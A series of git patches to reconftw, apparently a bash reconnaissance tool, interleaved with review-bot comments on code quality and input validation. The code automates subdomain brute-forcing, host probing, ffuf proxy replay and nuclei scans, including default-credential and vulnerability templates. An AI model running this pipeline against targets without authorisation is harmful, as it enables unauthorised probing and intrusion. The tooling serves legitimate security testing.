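Review bot: Dropping `-H "${HEADER}"` from the nuclei call in subtakeover is not paired with any replacement in the hunk, even though the commit subject says "random headers"; `HEADER=` is still defined in reconftw.cfg (visible as context in the cfg hunk above), so takeover checks now go out with nuclei's own default User-Agent and the cfg value is silently unused here. If relying on nuclei's built-in behaviour is intended, say so at the call site, e.g. `# HEADER from reconftw.cfg is deliberately not passed; nuclei selects its own User-Agent`. The same removal is repeated nine times in the nuclei_check hunk of this commit and would take the same comment once. subtakeover's `if`/`else` frame is outside the hunk.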
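Review bot: The `if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] … ffuf -replay-proxy` block added to webprobe_simple is repeated verbatim in the webprobe_full hunk and in the urlchecks hunk of this commit, differing only in the wordlist path and message, and none of the three checks that the list is non-empty before handing it to ffuf. A helper taking the file as its argument (below) removes the triplication and adds the `[ -s ]` guard; each call site becomes `send_to_proxy webs/webs.txt`. Note that `$proxy_url` is expanded on an `eval` line, so the config value is re-parsed by the shell; the helper keeps the project's eval style, but a value containing whitespace or metacharacters would still be split. webprobe_simple's `if`/`else` frame is outside the hunk.
```shell
# Replay every line of the given list through proxy_url with ffuf.
# No-op unless PROXY=true, proxy_url is set and the list is non-empty.
function send_to_proxy(){
  local list=$1
  if [ "$PROXY" = true ] && [ -n "$proxy_url" ] && [ -s "$list" ]
  then
    notification "Sending $list to proxy" info
    eval ffuf -mc all -w "$list" -u FUZZ -replay-proxy $proxy_url $DEBUG_STD
  fi
}
```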
@@ -640,6 +649,11 @@ function webprobe_full(){
 notification "Uncommon web ports: ${NUMOFLINES} new websites" good
 eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR
 end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]}
+ if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ]
+ then
+ notification "Sending websites uncommon ports to proxy" info
+ eval ffuf -mc all -w webs/webs_uncommon_ports.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD
+ fi
 else
 if [ "$WEBPROBEFULL" = false ]; then
 printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
@@ -779,23 +793,23 @@ function nuclei_check(){ eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/dns/ -r 
$resolvers_trusted -o nuclei_output/dns.txt printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt printf "\n\n" end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else @@ -917,6 +931,11 @@ function urlchecks(){ NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) notification "${NUMOFLINES} new urls with params" info end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1000 ]] + then + notification "Sending urls to proxy" info + eval ffuf -mc all -w webs/url_extract.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi From 228a049f4fa898efea216863c6870739fcab7a64 Mon Sep 17 00:00:00 2001 
From: six2dez Date: Mon, 19 Apr 2021 10:48:27 +0200 Subject: [PATCH 10/19] Fix multi && nuclei --- reconftw.sh | 54 ++++++++++++++++++++++++++++------------------------- 1 file changed, 29 insertions(+), 25 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 06e10dd1..ce16cbc0 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -625,7 +625,7 @@ function webprobe_simple(){ end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs.txt| wc -l) -le 1500 ]] then notification "Sending websites to proxy" info eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD @@ -649,7 +649,7 @@ function webprobe_full(){ notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs_uncommon_ports.txt| wc -l) -le 1500 ]] then notification "Sending websites uncommon ports to proxy" info eval ffuf -mc all -w webs/webs_uncommon_ports.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD 
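Review bot: The `1500` cap on lines replayed to the proxy is hard-coded in the webprobe_simple hunk, again in the webprobe_full hunk on this line, and (changed from 1000) in the urlchecks hunk of this commit, so the three sites can drift apart again as they already did once. A single cfg value next to `PROXY=false` — call it `PROXY_MAX_LINES=1500` for illustration, the name is not from the page — referenced as `[[ $(wc -l < webs/webs.txt) -le $PROXY_MAX_LINES ]]` keeps them in step. `$(cat webs/webs.txt| wc -l)` also spawns `cat` for nothing; `wc -l < webs/webs.txt` gives the same count. Both functions' surrounding code is outside the hunks.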
@@ -792,24 +792,16 @@ function nuclei_check(){ start_func "Templates based web scanner" eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output - printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt - printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt - printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt - printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt - printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt - printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt - printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt - printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt - printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt + printf "${yellow}\n Running : Nuclei Info${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ 
-severity info -r $resolvers_trusted -o nuclei_output/info.txt + printf "${yellow}\n\n Running : Nuclei Low${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity low -r $resolvers_trusted -o nuclei_output/low.txt + printf "${yellow}\n\n Running : Nuclei Medium${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity medium -r $resolvers_trusted -o nuclei_output/medium.txt + printf "${yellow}\n\n Running : Nuclei High${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity high -r $resolvers_trusted -o nuclei_output/high.txt + printf "${yellow}\n\n Running : Nuclei Critical${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity critical -r $resolvers_trusted -o nuclei_output/critical.txt printf "\n\n" end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else @@ -931,7 +923,7 @@ function urlchecks(){ NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) notification "${NUMOFLINES} new urls with params" info end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1000 ]] + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1500 ]] then notification "Sending urls to proxy" info eval ffuf -mc all -w webs/url_extract.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD @@ -1598,6 +1590,16 @@ function recon(){ } function multi_recon(){ + + + global_start=`date +%s` + + if [ "$NOTIFICATION" = true ] ; then + NOTIFY="notify -silent" + else + NOTIFY="" + fi + if [ -s "$list" ] then targets=$(cat $list) 
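Review bot: Each of the five severity runs in the rewritten nuclei_check body loads the full template tree and starts a scan even when webs/webs.txt is empty, and `-o` still creates five empty files under nuclei_output; a guard such as `[ -s webs/webs.txt ] || return` before the first `printf` avoids five template loads on an empty list. If separate per-severity output files are not required, nuclei's `-severity` accepts a comma-separated list and the five passes collapse into one; if they are required, a comment `# one pass per severity so findings land in separate files` stops the next reader from merging them. `cat webs/webs.txt | nuclei …` can also be `nuclei -l webs/webs.txt …`. nuclei_check's `if`/`else` frame is outside the hunk.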
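Review bot: `global_start` at the top of multi_recon is assigned with a backtick command substitution while the rest of the file uses `$(...)` (`targets=$(cat $list)` a few lines below in the same hunk); write `global_start=$(date +%s)`. `NOTIFY="notify -silent"` stores a command line in a plain string that is presumably expanded unquoted later, which works for this fixed value but breaks as soon as an argument contains whitespace; an array `NOTIFY=(notify -silent)` expanded as `"${NOTIFY[@]}"` is the robust form. The remainder of multi_recon is outside this hunk.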
@@ -1605,14 +1607,16 @@ function multi_recon(){ notification "Target list not provided" error exit fi + workdir=$SCRIPTPATH/Recon/$multi mkdir -p $workdir && cd $workdir - mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns for domain in $targets; do dir=$workdir/targets/$domain + called_fn_dir=$dir/.called_fn mkdir -p $dir cd $dir - mkdir -p .tmp .called_fn_dir osint subdomains webs hosts vulns + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns domain_info emails google_dorks @@ -1741,8 +1745,8 @@ while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do ## TARGETS -# m ) multi=$OPTARG -# ;; + m ) multi=$OPTARG + ;; d ) domain=$OPTARG ;; l ) list=$OPTARG From 841031bacedfbde6c3d4e99712a5e033384ccac6 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 10:57:30 +0200 Subject: [PATCH 11/19] Fix nuclei --- reconftw.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/reconftw.sh b/reconftw.sh index ce16cbc0..13226009 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -998,7 +998,7 @@ function jschecks(){ cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD + cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then From 3117967d0d42349e5ad446d619c3a919e049659d Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 11:06:02 +0200 Subject: [PATCH 12/19] Multi help added --- reconftw.sh | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 13226009..bd244ecd 100755 --- a/reconftw.sh +++ b/reconftw.sh 
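Review bot: `workdir=$SCRIPTPATH/Recon/$multi` builds a directory path from the `-m` option (only now enabled in the getopts hunk further down this line) with no validation or quoting, and `mkdir -p $workdir && cd $workdir` then creates and enters it; a value containing `/`, `..` or whitespace places the whole run outside `Recon/` or splits into several arguments, and every later relative write (`.tmp`, `.called_fn`, `subdomains`, …) follows. Reject such values before use, e.g. `[[ "$multi" =~ ^[A-Za-z0-9_-][A-Za-z0-9._-]*$ ]] || { notification "Invalid -m value" error; exit 1; }`, and quote `"$workdir"` in the mkdir/cd line. `dir=$workdir/targets/$domain` has the same shape with `$domain` read from the list file, so the same check belongs in the loop. The loop body continues outside the hunk.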
@@ -1666,6 +1666,7 @@ function multi_recon(){ done cd $workdir dir=$workdir + domain=$multi end } @@ -1682,7 +1683,7 @@ function help(){ printf "\n [-r] [-s] [-p] [-a] [-w] [-i] [-v] [-h] [--deep] [--fs] [-o OUTPUT]\n\n" printf " ${bblue}TARGET OPTIONS${reset}\n" printf " -d domain.tld Target domain\n" -# printf " -m company Target company name\n" + printf " -m company Target company name\n" printf " -l list.txt Targets list, one per line\n" printf " -x oos.txt Exclude subdomains list (Out Of Scope)\n" printf " -i in.txt Include subdomains list\n" @@ -1710,9 +1711,9 @@ function help(){ printf " Web scanning for subdomain list:\n" printf " ./reconftw.sh -d example.com -l targets.txt -w\n" printf " \n" -# printf " Multidomain recon:\n" -# printf " ./reconftw.sh -m company -l domainlist.txt -r\n" -# printf " \n" + printf " Multidomain recon:\n" + printf " ./reconftw.sh -m company -l domainlist.txt -r\n" + printf " \n" printf " Full recon with custom output and excluded subdomains list:\n" printf " ./reconftw.sh -d example.com -x out.txt -a -o custom/path\n" } From 32bb4a9eedbbbded778d247c25d194f05fa3d54e Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 13:56:06 +0200 Subject: [PATCH 13/19] Gowitness DB added --- reconftw.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index bd244ecd..455ed545 100755 --- a/reconftw.sh +++ b/reconftw.sh 
@@ -667,8 +667,8 @@ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then start_func "Web Screenshots" - eval gowitness file -f webs/webs.txt --disable-db --disable-logging $DEBUG_ERROR - eval gowitness file -f webs/webs_uncommon_ports.txt --disable-db --disable-logging $DEBUG_ERROR + eval gowitness file -f webs/webs.txt --disable-logging $DEBUG_ERROR + eval gowitness file -f webs/webs_uncommon_ports.txt --disable-logging $DEBUG_ERROR end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then From a099c2dcf071aa494c14c6ffb97afbd509198118 Mon Sep 17 00:00:00 2001 From: six2dez Date: Tue, 20 Apr 2021 16:51:27 +0200 Subject: [PATCH 14/19] Menu fixes --- reconftw.sh | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 455ed545..b5fe1489 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -533,9 +533,6 @@ function sub_recursive(){ NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) - if [ "$NUMOFLINES" -gt 0 ]; then - notification "${NUMOFLINES} new subdomains found with recursive search" info - fi end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} else notification "Skipping Recursive: Too Much Subdomains" warn @@ -1573,6 +1570,7 @@ function recon(){ subdomains_full subtakeover zonetransfer + s3buckets webprobe_full screenshot favicon @@ -1651,6 +1649,7 @@ function multi_recon(){ portscan cloudprovider + s3buckets waf_checks nuclei_check for domain in $targets; do @@ -1673,8 +1672,10 @@ function multi_recon(){ function subs_menu(){ start subdomains_full + webprobe_full subtakeover zonetransfer + s3buckets end } @@ -1819,6 +1820,8 @@ while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do cp $SCRIPTPATH/$list $dir/webs/webs.txt fi fi + subtakeover + s3buckets waf_checks nuclei_check cms_scanner 
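Review bot: Removing `--disable-db` from both gowitness calls makes gowitness persist its database, but nothing in the hunk says where it goes, and `end_func "Results are saved in screenshots folder"` still mentions only the screenshots; the database presumably lands at gowitness's default location relative to the working directory, which the commit subject "Gowitness DB added" wants but no reader of the function will learn. Add `# gowitness DB is kept (default path) so its report UI can be served from this run later` above the first call and extend the end_func message to name the database. The function's `if`/`else` frame is outside the hunk.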
From 69b6d552bd7540c10bd2d2ae5a24ee9a11d9edef Mon Sep 17 00:00:00 2001 From: six2dez Date: Thu, 22 Apr 2021 07:56:15 +0200 Subject: [PATCH 15/19] Some fixes and tweaks --- reconftw.sh | 17 +- reconftw_axiom.sh | 1859 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 1867 insertions(+), 9 deletions(-) create mode 100755 reconftw_axiom.sh diff --git a/reconftw.sh b/reconftw.sh index b5fe1489..4fbfe7b6 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -378,7 +378,7 @@ function sub_active(){ deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD echo $domain | eval dnsx -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt - NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" 
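Review bot: The new `grep "$domain$"` filter in sub_active is an unescaped, left-unanchored regex: for `domain=example.com` it also accepts `notexample.com` and `examplexcom`, because `.` matches any character and nothing requires a label boundary before the domain. Since this filter is what keeps out-of-scope hosts out of subdomains/subdomains.txt, use a boundary-aware, escaped form such as `grep -E "(^|\.)${domain//./\\.}$"` so that only the apex and true subdomains pass; the same pattern is added in the sub_dns, sub_brute, sub_scraping, sub_permut and sub_recursive hunks of this commit and should change together. sub_active's `if`/`else` frame is outside the hunk.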
@@ -392,7 +392,7 @@ function sub_dns(){
 eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD
 cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt
 eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
- NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l)
+ NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
 end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]}
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
@@ -408,7 +408,7 @@ function sub_brute(){
 else
 eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
 fi
- NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | anew subdomains/subdomains.txt | wc -l)
+ NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
 end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]}
 else
 if [ "$SUBBRUTE" = false ]; then
@@ -425,8 +425,8 @@ function sub_scraping(){
 start_subfunc "Running : Source code scraping subdomain search"
 touch .tmp/scrap_subs.txt
 cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
- cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt
- cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt
+ cat .tmp/probed_tmp_scrap.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt
+ cat .tmp/probed_tmp_scrap.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/scrap_subs.txt
 if [ "$DEEP" = true ] ; then
 gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt
 else
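Review bot: The two rewritten pipelines now read `.tmp/probed_tmp_scrap.txt` with `cat` while `anew .tmp/probed_tmp_scrap.txt` further down the same pipeline appends to it, so the file is read and extended concurrently: hosts that httpx discovers are appended while `cat` may still be feeding, and on an input larger than the pipe buffer `cat` can pick those lines up and re-probe them. Snapshot the input first — `cp .tmp/probed_tmp_scrap.txt .tmp/probed_tmp_scrap_in.txt` and read from the copy in both lines — so each probe sees a fixed list. sub_scraping continues outside the hunk.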
@@ -435,7 +435,7 @@ function sub_scraping(){
 sed -i '/^.\{2048\}./d' .tmp/gospider.txt
 cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt
 eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
- NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l)
+ NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l)
 cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
 end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]}
 else
@@ -497,7 +497,7 @@ function sub_permut(){
 if [ -f ".tmp/permute_subs.txt" ]
 then
 deleteOutScoped $outOfScope_file .tmp/permute_subs.txt
- NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l)
+ NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
 else
 NUMOFLINES=0
 fi
@@ -531,7 +531,7 @@ function sub_recursive(){ eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt - NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} else @@ -1672,7 +1672,6 @@ function multi_recon(){ function subs_menu(){ start subdomains_full - webprobe_full subtakeover zonetransfer s3buckets diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh new file mode 100755 index 00000000..920dfc70 --- /dev/null +++ b/reconftw_axiom.sh 
